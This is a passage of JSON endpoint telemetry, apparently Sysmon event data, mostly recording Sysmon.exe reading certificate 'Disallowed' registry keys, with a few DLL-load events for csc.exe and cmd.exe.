"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570862610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860270000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\SysWOW64\\version.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570861210000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570861990000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570862770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 